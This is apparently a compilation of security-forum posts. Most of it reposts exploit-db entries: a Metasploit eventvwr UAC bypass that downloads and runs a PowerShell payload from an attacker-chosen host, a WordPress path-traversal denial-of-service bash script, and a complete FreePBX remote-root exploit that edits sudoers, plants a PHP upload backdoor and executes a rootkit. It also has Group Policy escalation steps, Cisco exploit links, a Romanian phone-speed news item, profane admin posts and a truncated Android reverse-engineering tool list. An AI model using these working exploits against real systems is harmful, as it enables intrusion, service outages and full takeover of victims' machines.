Initiative Enterprises is an Orlando-based company that provides software consulting, application development, code auditing, and security engineering services. We specialize in PHP Security and applied cryptography. Sursa: https://paragonie.com/blog/2016/08/on-insecurity-popular-open-source-php-cms-platforms

chimera_pe ChimeraPE demo: maps another executable into the target process and runs both. This is an alternative method to the classic RunPE (process hollowing) - can be used in case if we want to run the original exe also. WARNING: This is a 32-bit version. 64-bit variant coming soon. Link: https://github.com/hasherezade/demos/tree/master/chimera_pe

Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit) ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE include Post::File include Post::Windows::Priv include Post::Windows::Runas include Post::Windows::Registry include Post::Windows::Powershell def initialize(info={}) super( update_info(info, 'Name' => 'Windows Escalate UAC Protection Bypass with Fileless', 'Description' => %q{ This module will bypass Windows UAC by utilizing eventvwr.exe and hijacking entries registry on Windows. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt Graeber', 'Enigma0x3', 'Pablo Gonzalez' # Port to local exploit ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/' ],['URL','http://www.elladodelmal.com/2016/08/como-ownear-windows-7-y-windows-10-con.html'], ], 'DisclosureDate'=> "Aug 15 2016" )) register_options([ OptString.new('FILE_DYNAMIC_PAYLOAD',[true,'Payload PSH Encoded will be generated here (Not include webserver path)']), OptString.new('IPHOST',[true,'IP WebServer where File Payload will be downloaded']), OptBool.new('LOCAL',[true,'File Payload is in this machine?',true] ), ]) end def check_permissions! # Check if you are an admin vprint_status('Checking admin status...') admin_group = is_in_admin_group? if admin_group.nil? print_error('Either whoami is not there or failed to execute') print_error('Continuing under assumption you already checked...') else if admin_group print_good('Part of Administrators group! Continuing...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end if get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') end end def exploit validate_environment! case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..." ) when UAC_DEFAULT print_good 'UAC is set to Default' print_good 'BypassUAC can bypass this setting, continuing...' when UAC_NO_PROMPT print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead" runas_method return end keys = registry_enumkeys('HKCU\Software\Classes\mscfile\shell\open\command') if keys == nil print_good("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command not exist!") end key = registry_createkey('HKCU\Software\Classes\mscfile\shell\open\command') reg = "IEX (New-Object Net.WebClient).DownloadString(\'http://#{datastore['IPHOST']}/#{datastore['FILE_DYNAMIC_PAYLOAD']}\')" command = cmd_psh_payload(payload.encoded, 'x86',{:remove_comspec => true,:encode_final_payload => true}) if datastore['LOCAL'] if File.exists?("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}") File.delete("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}") end file_local_write("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}",command) end result = registry_setvaldata('HKCU\Software\Classes\mscfile\shell\open\command','bypass','C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -C ' + reg,'REG_SZ') if result execute_script("cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcANwBiADAASABZAEIAeABKAGwAaQBVAG0ATAAyADMASwBlADMAOQBLADkAVQByAFgANABIAFMAaABDAEkAQgBnAEUAeQBUAFkAawBFAEEAUQA3AE0ARwBJAHoAZQBhAFMANwBCADEAcABSAHkATQBwAHEAeQBxAEIAeQBtAFYAVwBaAFYAMQBtAEYAawBEAE0ANwBaADIAOAA5ADkANQA3ADcANwAzADMAMwBuAHYAdgB2AGYAZQA2AE8ANQAxAE8ASgAvAGYAZgAvAHoAOQBjAFoAbQBRAEIAYgBQAGIATwBTAHQAcgBKAG4AaQBHAEEAcQBzAGcAZgBQADMANQA4AEgAegA4AGkALwBxAC8ALwArADkAZgA0ADMAWAA2AE4AKwB0AGQAWQAvAHgAcgB0AHIANQBIADkARwB1AG0AdgA4AFIAbgA5AC8ANgBOAGYANAA5AHUALwB4AHUALwAxAGEANQB6ADgARwBsAC8AOQBHAG8AOQArAGoAZAAvADMAMQAzAGoAOQBhADEAUwAvAHgAagBsADkAZQAwAFgAZgAxADcAOQBHAFQAcAArAGMALwBCAG8AbAAvAGQANwBRAGYAegBuADkALwAvAGYAOQBOAFIAYgAwADcANQBUAGEARgBQAFEANQB2AG0AOQArAGoAVABuADkATABPAG0ALwAzADUAZgBlAFgAZABIAHYAUwAvAHAAdABTAHIAOAB2ADYATAArAE0ALwBwAHAAUgBIADcALwB4AHIANQBGAFEAegB4AFgAQgBuAEgARQBMADYAWAB2AHIAMQAvAGkAYwAvAG0AcAAvAGoAZQAxAGYANAA0AHoAKwB6AGEAbgA5AFMAMgBvAGgAVQBHAHIANgA1AEoAcgBhAGIATgBOAG4ARwBmADAAKwBwADkAOQA5ADMATABkAC8AagBSAGYAMABjADAARQB0ADAAMQAvAGoANAAxADkAagBRAG0AMQBYAGkAdQBmAEgAdgA4AGEAZABYADIATQBjAGYASQBMAGUAWAAxAEQATABLADYAKwBuAEwAcgBSAG4AagBOADIAVQA0AGYAMABNAC8AYgAvAGIAUABvAGEAWgBqADgASABXAHIALwBHAFUAZgBqAHUAbgBUADkAWgBFAGkANQBaAHcAKwBKAGoAYgAvAEMAUgA5AFUAdABKAG4ATwBmAGYAbwBVADIAQwA3AEIALwBNAE4ANAA0AHkAVwBEAGYAMQBkAEUANAAyAFgAdgA4AFoARgBGAEwAcwB2AEcAWABOAGcAZwBOADcASwAvAHcAYwA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=") print_good('Created registry entries to hijack!') end r = session.sys.process.execute("cmd.exe /c c:\\windows\\system32\\eventvwr.exe",nil,{'Hidden' => true, 'Channelized' => true}) check_permissions! end def validate_environment! fail_with(Failure::None, 'Already in elevated state') if is_admin? or is_system? winver = sysinfo['OS'] unless winver =~ /Windows Vista|Windows 2008|Windows [78]/ fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.") end if is_uac_enabled? print_status 'UAC is Enabled, checking level...' else if is_in_admin_group? fail_with(Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end end end Sursa: https://www.exploit-db.com/exploits/40268/

WordPress 4.5.3 - Directory Traversal / Denial of Service Path traversal vulnerability in WordPress Core Ajax handlers Abstract A path traversal vulnerability was found in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site. Contact For feedback or questions about this advisory mail us at sumofpwn at securify.nl The Summer of Pwnage This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam. OVE ID OVE-20160712-0036 See also - CVE-2016-6896 - CVE-2016-6897 - #37490 - Improve capability checks in wp_ajax_update_plugin() and wp_ajax_delete_plugin() Tested versions This issue was successfully tested on the WordPress version 4.5.3. Fix WordPress version 4.6 mitigates this vulnerability by moving the CSRF check to the top of the affected method(s). Introduction WordPress is web software that can be used to create a website, blog, or app. A path traversal vulnerability exists in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site. Details The path traversal vulnerability exists in the file ajax-actions.php, in particular in the function wp_ajax_update_plugin(). The function first tries to retrieve some version information from the target plugin. After this is done, it checks the user's privileges and it will verify the nonce (to prevent Cross-Site Request Forgery). The code that retrieves the version information from the plugin is vulnerable to path traversal. Since the security checks are done at a later stage, the affected code is reachable by any logged on user, including Subscribers. Potentially this issue can be used to disclose information, provided that the target file contains a line with Version:. What is more important that it also allows for a denial of service condition as the logged in attacker can use this flaw to read up to 8 KB of data from /dev/random. Doing this repeatedly will deplete the entropy pool, which causes /dev/random to block; blocking the PHP scripts. Using a very simple script, it is possible for an authenticated user (Subscriber) to bring down a WordPress site. It is also possible to trigger this issue via Cross-Site Request Forgery as the nonce check is done too late in this case. Proof of concept The following Bash script can be used to trigger the denial of service condition. #!/bin/bash target="http://<target>" username="subscriber" password="password" cookiejar=$(mktemp) # login curl --cookie-jar "$cookiejar" \ --data "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2f&testcookie=1" \ "$target/wp-login.php" \ >/dev/null 2>&1 # exhaust apache for i in `seq 1 1000` do curl --cookie "$cookiejar" \ --data "plugin=../../../../../../../../../../dev/random&action=update-plugin" \ "$target/wp-admin/admin-ajax.php" \ >/dev/null 2>&1 & done rm "$cookiejar" Sursa: https://www.exploit-db.com/exploits/40288/

FreePBX 13 / 14 - Remote Command Execution With Privilege Escalation #!/usr/bin/env python # -*- coding, latin-1 -*- ###################################################### # # # DESCRIPTION # # FreePBX 13 remote root 0day - Found and exploited by pgt @ nullsecurity.net # # # # AUTHOR # # pgt - nullsecurity.net # # # # DATE # # 8-12-2016 # # # # VERSION # # freepbx0day.py 0.1 # # # # AFFECTED VERSIONS # # FreePBX 13 & 14 (System Recordings Module versions: 13.0.1beta1 - 13.0.26) # # # # STATUS # # Fixed 08-10-2016 - http://issues.freepbx.org/browse/FREEPBX-12908 # # # # TESTED AGAINST # # * http://downloads.freepbxdistro.org/ISO/FreePBX-64bit-10.13.66.iso # # * http://downloads.freepbxdistro.org/ISO/FreePBX-32bit-10.13.66.iso # # # # TODO # # * SSL support (priv8) # # * parameter for TCP port # # # # HINT # # Base64 Badchars: '+', '/', '=' # # # ################################################################################ ''' Successful exploitation should looks like: [*] enum FreePBX version [+] target running FreePBX 13 [*] checking if target is vulnerable [+] target seems to be vulnerable [*] getting kernel version [!] Kernel: Linux localhost.localdomain 2.6.32-504.8.1.el6.x86_64 .... [+] Linux x86_64 platform [*] adding 'echo "asterisk ALL=(ALL) NOPASSWD:...' to freepbx_engine [*] triggering incrond to gaining root permissions via sudo [*] waiting 20 seconds while incrond restarts applications - /_!_\ VERY LOUD! [*] removing 'echo "asterisk ALL=(ALL) NOPASSWD:...' from freepbx_engine [*] checking if we gained root permissions [!] w00tw00t w3 r r00t - uid=0(root) gid=0(root) groups=0(root) [+] adding view.php to admin/.htaccess [*] creating upload script: admin/libraries/view.php [*] uploading ${YOUR_ROOTKIT} to /tmp/23 via admin/libraries/view.php [*] removing view.php from admin/.htaccess [*] rm -f admin/libraries/view.php [!] execute: chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1; rm -f /tmp/23 [*] removing 'asterisk ALL=(ALL) NOPASSWD:ALL' from /etc/sudoers [*] removing all temp files [!] have fun and HACK THE PLANET! ''' import base64 import httplib import optparse import re from socket import * import sys import time BANNER = '''\033[0;31m ################################################################################ #___________ ________________________ ___ ____________ # #\_ _____/______ ____ ____\______ \______ \ \/ / /_ \_____ \ # # | __) \_ __ \_/ __ \_/ __ \| ___/| | _/\ / | | _(__ < # # | \ | | \/\ ___/\ ___/| | | | \/ \ | |/ \ # # \___ / |__| \___ >\___ >____| |______ /___/\ \ |___/______ / # # \/ \/ \/ \/ \_/ \/ # # _______ .___ # # \ _ \ __| _/____ ___.__. * Remote Root 0-Day # # / /_\ \ ______ / __ |\__ \< | | # # \ \_/ \ /_____/ / /_/ | / __ \ \___ | # # \_____ / \____ |(____ / ____| # # \/ \/ \/\/ # # # # * Remote Command Execution Exploit (FreePBX 14 is affected also) # # * Local Root Exploit (probably FreePBX 14 is also exploitable) # # * Backdoor Upload + Execute As Root # # # # * Author: pgt - nullsecurity.net # # * Version: 0.1 # # # ################################################################################ \033[0;m''' def argspage(): parser = optparse.OptionParser() parser.add_option('-u', default=False, metavar='<url>', help='ip/url to exploit') parser.add_option('-r', default=False, metavar='<file>', help='Linux 32bit bd/rootkit') parser.add_option('-R', default=False, metavar='<file>', help='Linux 64bit bd/rootkit') parser.add_option('-a', default='/', metavar='<path>', help='FreePBX path - default: \'/\'') args, args2 = parser.parse_args() if (args.u == False) or (args.r == False) or (args.R == False): print '' parser.print_help() print '\n' exit(0) return args def cleanup_fe(): print '[*] removing \'echo "asterisk ALL=(ALL) NOPASSWD:...' \ '\' from freepbx_engine' cmd = 'sed -i -- \' /echo \"asterisk ALL=(ALL) NOPASSWD\:ALL\">>' \ '\/etc\/sudoers/d\' /var/lib/asterisk/bin/freepbx_engine' command_execution(cmd) return def cleanup_lr(): print '[*] removing \'echo "asterisk ALL=(ALL) NOPASSWD:...' \ '\' from launch-restapps' cmd = 'sed -i -- \':r;$!{N;br};s/\\necho "asterisk.*//g\' ' \ 'modules/restapps/launch-restapps.sh' command_execution(cmd) return def cleanup_htaccess(): print '[*] removing view.php from admin/.htaccess' cmd = 'sed -i -- \'s/config\\\\.php|view\\\\.php|ajax\\\\.php/' \ 'config\\\\.php|ajax\\\\.php/g\' .htaccess' command_execution(cmd) return def cleanup_view_php(): print '[*] rm -f admin/libraries/view.php' cmd = 'rm -f libraries/view.php' command_execution(cmd) return def cleanup_sudoers(): print '[*] removing \'asterisk ALL=(ALL) NOPASSWD:ALL\' from /etc/sudoers' cmd = 'sudo sed -i -- \'/asterisk ALL=(ALL) NOPASSWD:ALL/d\' /etc/sudoers' command_execution(cmd) return def cleanup_tmpfiles(): print '[*] removing all temp files' cmd = 'find / -name *w00t* -exec rm -f {} \; 2> /dev/null' command_execution(cmd) return def check_platform(response): if (response.find('Linux') != -1) and (response.find('x86_64') != -1): print '[+] Linux x86_64 platform' return '64' elif (response.find('Linux') != -1) and (response.find('i686') != -1): print '[+] Linux i686 platform' cleanup_tmpfiles() sys.exit(1) return '32' else: print '[-] adjust check_platform() when you want to backdoor ' \ 'other platforms' cleanup_tmpfiles() sys.exit(1) def check_kernel(response): if response.find('w00t') != -1: start = response.find('w00t') + 4 end = response.find('w00tw00t') - 1 print '[!] Kernel: %s' % (response[start:end].replace('\\', '')) return check_platform(response[start:end]) def check_root(response): if response.find('uid=0(root)') != -1: start = response.find('w00t') + 4 end = response.find('w00tw00t') - 2 print '[!] w00tw00t w3 r r00t - %s' % (response[start:end]) return else: print '[-] we are not root :(' cleanup_fe() cleanup_lr() cleanup_tmpfiles() sys.exit(1) def build_request(filename): body = 'file=%s&name=a&codec=gsm&lang=ru&temporary=1' \ '&command=convert&module=recordings' % (filename) content_type = 'application/x-www-form-urlencoded; charset=UTF-8' return content_type, body def filter_filename(response): start = response.find('localfilename":"w00t') + 16 end = response.find('.wav') + 4 return response[start:end] def post(path, content_type, body): h = httplib.HTTP(ARGS.u) h.putrequest('POST', '%s%s' % (ARGS.a, path)) h.putheader('Host' , '%s' % (ARGS.u)) h.putheader('Referer' , 'http://%s/' % (ARGS.u)) h.putheader('Content-Type', content_type) h.putheader('Content-Length', str(len(body))) h.endheaders() h.send(body) errcode, errmsg, headers = h.getreply() return h.file.read() def encode_multipart_formdata(fields, filename=None): LIMIT = '----------lImIt_of_THE_fIle_eW_$' CRLF = '\r\n' L = [] L.append('--' + LIMIT) if fields: for (key, value) in fields.items(): L.append('Content-Disposition: form-data; name="%s"' % key) L.append('') L.append(value) L.append('--' + LIMIT) if filename == None: L.append('Content-Disposition: form-data; name="file"; filename="dasd"') L.append('Content-Type: audio/mpeg') L.append('') L.append('da') else: L.append('Content-Disposition: form-data; name="file"; filename="dasd"') L.append('Content-Type: application/octet-stream') L.append('') L.append(open_file(filename)) L.append('--' + LIMIT + '--') L.append('') body = CRLF.join(L) content_type = 'multipart/form-data; boundary=%s' % (LIMIT) return content_type, body def create_fields(payload): fields = {'id': '1', 'name': 'aaaa', 'extension': '0', 'language': 'ru', 'systemrecording': '', 'filename': 'w00t%s' % (payload)} return fields def command_execution(cmd): upload_path = 'admin/ajax.php?module=recordings&command=' \ 'savebrowserrecording' cmd = base64.b64encode(cmd) payload = '`echo %s | base64 -d | sh`' % (cmd) fields = create_fields(payload) content_type, body = encode_multipart_formdata(fields) response = post(upload_path, content_type, body) filename = filter_filename(response) content_type, body = build_request(filename) return post('admin/ajax.php', content_type, body) def check_vuln(): h = httplib.HTTP(ARGS.u) h.putrequest('GET', '%sadmin/ajax.php' % (ARGS.a)) h.putheader('Host' , '%s' % (ARGS.u)) h.endheaders() errcode, errmsg, headers = h.getreply() response = h.file.read() if response.find('{"error":"ajaxRequest declined - Referrer"}') == -1: print '[-] target seems not to be vulnerable' sys.exit(1) upload_path = 'admin/ajax.php?module=recordings&command' \ '=savebrowserrecording' payload = 'w00tw00t' fields = create_fields(payload) content_type, body = encode_multipart_formdata(fields) response = post(upload_path, content_type, body) if response.find('localfilename":"w00tw00tw00t') != -1: print '[+] target seems to be vulnerable' return else: print '[-] target seems not to be vulnerable' sys.exit(1) def open_file(filename): try: f = open(filename, 'rb') file_content = f.read() f.close() return file_content except IOError: print '[-] %s does not exists!' % (filename) sys.exit(1) def version13(): print '[*] checking if target is vulnerable' check_vuln() print '[*] getting kernel version' cmd = 'uname -a; echo w00tw00t' response = command_execution(cmd) result = check_kernel(response) if result == '64': backdoor = ARGS.R elif result == '32': backdoor = ARGS.r print '[*] adding \'echo "asterisk ALL=(ALL) NOPASSWD:...\' ' \ 'to freepbx_engine' cmd = 'sed -i -- \'s/Com Inc./Com Inc.\\necho "asterisk ALL=\(ALL\)\ ' \ 'NOPASSWD\:ALL"\>\>\/etc\/sudoers/g\' /var/lib/' \ 'asterisk/bin/freepbx_engine' command_execution(cmd) print '[*] triggering incrond to gaining root permissions via sudo' cmd = 'echo a > /var/spool/asterisk/sysadmin/amportal_restart' command_execution(cmd) print '[*] waiting 20 seconds while incrond restarts applications' \ ' - /_!_\\ VERY LOUD!' time.sleep(20) cleanup_fe() #cleanup_lr() print '[*] checking if we gained root permissions' cmd = 'sudo -n id; echo w00tw00t' response = command_execution(cmd) check_root(response) print '[+] adding view.php to admin/.htaccess' cmd = 'sed -i -- \'s/config\\\\.php|ajax\\\\.php/' \ 'config\\\\.php|view\\\\.php|ajax\\\\.php/g\' .htaccess' command_execution(cmd) print '[*] creating upload script: admin/libraries/view.php' cmd = 'echo \'<?php move_uploaded_file($_FILES["file"]' \ '["tmp_name"], "/tmp/23");?>\' > libraries/view.php' command_execution(cmd) print '[*] uploading %s to /tmp/23 via ' \ 'admin/libraries/view.php' % (backdoor) content_type, body = encode_multipart_formdata(False, backdoor) post('admin/libraries/view.php', content_type, body) cleanup_htaccess() cleanup_view_php() print '[!] execute: chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1;' \ ' rm -f /tmp/23' cmd = 'chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1; rm -f /tmp/23' setdefaulttimeout(5) try: command_execution(cmd) except timeout: ''' l4zY w0rk ''' setdefaulttimeout(20) try: cleanup_sudoers() cleanup_tmpfiles() except timeout: cleanup_tmpfiles() return def enum_version(): h = httplib.HTTP(ARGS.u) h.putrequest('GET', '%sadmin/config.php' % (ARGS.a)) h.putheader('Host' , '%s' % (ARGS.u)) h.endheaders() errcode, errmsg, headers = h.getreply() response = h.file.read() if response.find('FreePBX 13') != -1: print '[+] target running FreePBX 13' return 13 else: print '[-] target is not running FreePBX 13' return False def checktarget(): if re.match(r'^[0-9.\-]*$', ARGS.u): target = ARGS.u else: try: target = gethostbyname(ARGS.u) except gaierror: print '[-] \'%s\' is unreachable' % (ARGS.u) sock = socket(AF_INET, SOCK_STREAM) sock.settimeout(5) result = sock.connect_ex((target, 80)) sock.close() if result != 0: '[-] \'%s\' is unreachable' % (ARGS.u) sys.exit(1) return def main(): print BANNER checktarget() open_file(ARGS.r) open_file(ARGS.R) print '[*] enum FreePBX version' result = enum_version() if result == 13: version13() print '[!] have fun and HACK THE PLANET!' return if __name__ == '__main__': ARGS = argspage() try: main() except KeyboardInterrupt: print '\nbye bye!!!' time.sleep(0.01) sys.exit(1) #EOF Sursa: https://www.exploit-db.com/exploits/40232/

Cisco ASA / PIX - Privilege Escalation (EPICBANANA) # Exploit Title: Cisco ASA / PIX - Privilege Escalation (EPICBANANA) # Date: 19-08-2016 # Exploit Author: Shadow Brokers # Vendor Homepage: http://www.cisco.com/ Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40271.zip Sursa: https://www.exploit-db.com/exploits/40271/

Cisco ASA 8.x - Authentication Bypass (EXTRABACON) # Exploit Title: Cisco ASA 8.X Authentication Bypass # Date: 17-08-2016 # Exploit Author: Equation Group # Vendor Homepage: Cisco # Software Link: Cisco # Version: Cisco ASA 8.X # Tested on: Cisco ASA 8.4.2 # CVE : Not sure Requirements: * SNMP read (public) string * Access to SNMP service * SSH port accessible Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40258.zip Sursa: https://www.exploit-db.com/exploits/40258/

Cel mai recent smartphone de top al celor de la Samsung, Galaxy Note 7, pierde la scor meciul cu iPhone 6S când vine vorba despre viteza de deschidere a aplicaţiilor. Galaxy Note 7 este un flagship proaspăt lansat. iPhone 6S face în curând un an de cât a intrat pe piaţă. Cu toate astea, smartphone-ul celor de la Apple se dovedeşte mult mai rapid decât phablet-ul tocmai lansat de Samsung, scrie News.ro. În testul publicat pe YouTube de către cei de la PhoneBuff a fost testată exclusiv viteza cu care sunt deschise acelaşi set de aplicaţii şi jocuri pe cele două telefoane. În total, cele două dispozitive au fost cronometrate pentru deschiderea a 14 aplicaţii şi jocuri. În final, iPhone 6S a încheiat testul după 1 minut şi 21 de secunde. Galaxy Note 7 a avut nevoie de 2 minute şi 4 secunde. Cea mai mare diferenţă dintre cele două dispozitive s-a făcut la nivelul jocurilor. Acestea au pornit semnificativ mai repede pe iPhone 6S decât pe Galaxy Note 7. Aceste rezultate s-au înregistrat în pofida faptului că Note 7 dispune de dotări hardware superioare. iPhone 6S foloseşte un procesor dezvoltat acum doi ani şi are 2 GB memorie RAM, în timp Note 7 are un procesor lansat acum 6 luni şi 4 GB memorie RAM. Concluzia logică este că software-ul face diferenţa. Un sistem de operare optimizat special pentru un anumit set de componente va fi net superior unuia scalat pentru rula pe sute de configuraţii posibile. Apple deţine controlul complet asupra iPhone şi poate optimiza sistemul de operare iOS pentru a rula cât mai eficient. Prin urmare şi cerinţele hardware sunt mai mici atunci când software-ul este optimizat corect. De cealaltă parte avem Android, care, la fel ca Windows pe PC-uri, trebuie să ruleze pe un număr foarte mare de dispozitive. Sarcina optimizării software-ului ar trebui să cadă pe producător. Acesta, însă, este ocupat cu lansarea într-un ritm alert a noi şi noi dispozitive şi nu se preocupă de acest aspect, încercând să compenseze cu dotările hardware. Ba chiar, mai mult, producătorul adaugă şi el sarcini suplimentare sistemului de operare, prin pre-instalarea de aplicaţii mai mult sau mai puţin inutile pentru utilizatori. Aşa se ajunge la discrepanţa majoră în care un telefon cu dotări net superioare rulează mult mai slab decât unul cu componente mai slabe, dar un software bine optimizat. Fanii Android se vor putea bucura de aşa ceva abia în momentul în care Google va dezvolta propriul smartphone şi va optimiza special sistemul de operare pentru el. Galaxy Note 7 este disponibil în România la un preţ de 3.900 de lei. Versiunea corespunzătoare de iPhone 6S, cu acelaşi spaţiu de stocare de 64 GB, costă aproximativ 3.800 de lei. Sursa: http://www.digi24.ro/Stiri/Digi24/Sci-tech/Gadget/cel+mai+rapid+telefon

Este un progres imens de la vBulletin la IPBoard. Nu mai eu stiu cate linii de cod am modificat in acea platforma (vB)... 1. Este cel mai mare forum de securitate, nu de web design - te inteleg daca apar probleme de securitate banale, nu daca se vede urat o tema 2. Nu esti singurul, insa sunt multe persoane care "au crescut" pe forum si care au avut de castigat (un job de exemplu) de pe urma sa, dar apoi l-au uitat (stii tu termenul - leeching) 3. S-au pierdut posturile din luna ianuarie a acestui an, atat. Si am urmarit forumul in acea perioada, crede-ma, nu s-a pierdut mare lucru 4. Sunt multi care au interes sa invete, putini capabili (ca timp) sa ii ajute 5. Moderatorii, ca si mine, au familie si job si nu mai au timp de forum 6. Profilul utilizatorului RST nu este acela, doar ca aceia ies mai mult in evidenta. Forumul nu e destinat programatorilor ci pasionatilor de securitate IT care trebuie sa aiba in sange ceva din descrierea ta. Cei care sunt programatori intra aici si deprind trasaturi non-programatorice cum ar fi "think outside the box" Pentesterii (ca si mine) isi pierd timpul pe aici. Insa sunt prea putini care au timpul si daruirea necesara de a posta materiale de calitate. Nu ai mintit, te inteles, sunt de acord cu tine (nu in totalitate). Exista posibilitatea ca acest forum sa dispara, nu neg asta, dar cat timp putem ajuta comunitatea romaneasca sa se dezvolte pe calea cea dreapta, forumul va ramane in picioare. Ma gandesc la tine ca la altii: probabil ai calitatile tehnice si psihologice necesare de a-i ajuta pe altii, dar se pare ca nu o faci. De ce? Pentru ca noua, romanilor, ne place doar sa ne plangem si vrem sa ii vedem pe altii ca fac ceva. Daca vrei o schimbare, incepe prin tine. // Nytro

"In the meantime you can submit a paper at the Call for Papers. Maybe, you'll be the next cyber security rock star. :-)"

PS: Cand puneti imagini, incercati sa folositi si voi HTTPS in loc de HTTP...

Mai sunt probleme: 1. Legate de tema (o sa mai lucrez la ea) 2. Legate de imagini postate pe forum (o sa verific) 3. Legate de imagini de profil/avatar - daca nu va merge, uploadati din nou si ar trebui sa fie ok. Muie InvisionPower shitservices.

Lucrez la el, o sa fie probleme si o sa arate nasol intre timp.

Salut, Dupa cum puteti observa, au aparut cateva probleme legate de tema. Imi bag pula in mortii si ranitii astora de la IP Board.

Microsoft Windows Group Policy - Privilege Escalation (MS16-072) # Exploit Title: Group Policy Elevation of Privilege Vulnerability # Date: 08-08-2016 # Exploit Author: Nabeel Ahmed # Tested on: Windows 7 Professional (x32/x64) # CVE : CVE-2016-3223 # Category: Privilege Escalation SPECIAL CONFIG: Standard Domain Member configuration with valid credentials. (Standard Domain User with valid credentials) SUMMARY: This vulnerability allows an attacker to create/modify local Administrator account through a fake Domain Controller by creating User Configuration Group Policies. 1) Prerequisites: - Standard Windows 7 Fully patched and member of an existing domain. (e.g. domain.local) - Domain User Credentials are known with no Administrative rights. - Computer has to be connected on a network. - Fake Domain Controller 2) Reproduce: STEP 1: Determine domain of the target computer (e.g. domain.local) STEP 2: Boot system and determine FQDN of the device. (example. CLIENT.domain.local), this can be obtained by monitoring the network broadcast communication, which the system sends prior to loggin in. The username can be extracted from the loginscreen (E.g USER1) STEP 3: Create Active Directory for the domain you obtained in STEP 2 (domain.local). STEP 4: Create User with similar name and password as the target computer. (E.g. domain\USER1:password123!). STEP 5: Login on the target system with the known Username and Password without any network connection (using cached credentials). STEP 6: Establish network connection between the target system and the newly created Domain Controller. STEP 7: Create a Group Policy called "Create Local Admin" STEP 8: Edit the "Create Local Admin" Group Policy to create in the User Configuration section a new user called "TestAdmin" and add him to the group "Administrators". STEP 9: Open Command Prompt on the target system and execute the following command: "gpupdate /target:user /force" STEP 10: User Policy update will complete successfully. STEP 11: Confirm the newly created Administrator "TestAdmin" by executing the following command in Command Prompt: "net localgroup Administrators" STEP 12: "TestAdmin" user will be member of the Administrators group. 3) Impact: A regular Domain User can gain higher privileges on his system by creating a new administrator through Group Policies created on a fake Domain Controller 4) Solution: Install the latest patches from 14-06-2016 using Windows Update. 5) References: https://technet.microsoft.com/en-us/library/security/ms16-072.aspx https://support.microsoft.com/en-us/kb/3163622 6) Credits: Vulnerability discovered by Nabeel Ahmed (https://twitter.com/NabeelAhmedBE) and Tom Gilis (https://twitter.com/tgilis) of Dimension Data (https://www.dimensiondata.com) Sursa: https://www.exploit-db.com/exploits/40219/

25 Awesome Android Reverse Engineering Tools A curated list of awesome Android reverse engineering tools. Be sure to check out our list of IDA Pro alternatives and best deobfuscation tools, too. 1. SMALI/BAKSMALI smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android’s Java VM implementation. The syntax is loosely based on Jasmin’s/dedexer’s syntax, and supports the full functionality of the dex format (annotations, debug info, line info, etc.) 2. ANDBUG AndBug is a debugger targeting the Android platform’s Dalvik virtual machine intended for reverse engineers and developers. It uses the same interfaces as Android’s Eclipse debugging plugin, the Java Debug Wire Protocol (JDWP) and Dalvik Debug Monitor (DDM) to permit users to hook Dalvik methods, examine process state, and even perform changes. Unlike Google’s own Android Software Development Kit debugging tools, AndBug does not require or expect source code. It does, however, require that you have some level of comfort with Python, as it uses a concept of scripted breakpoints, called “hooks”, for most nontrivial tasks. 3. 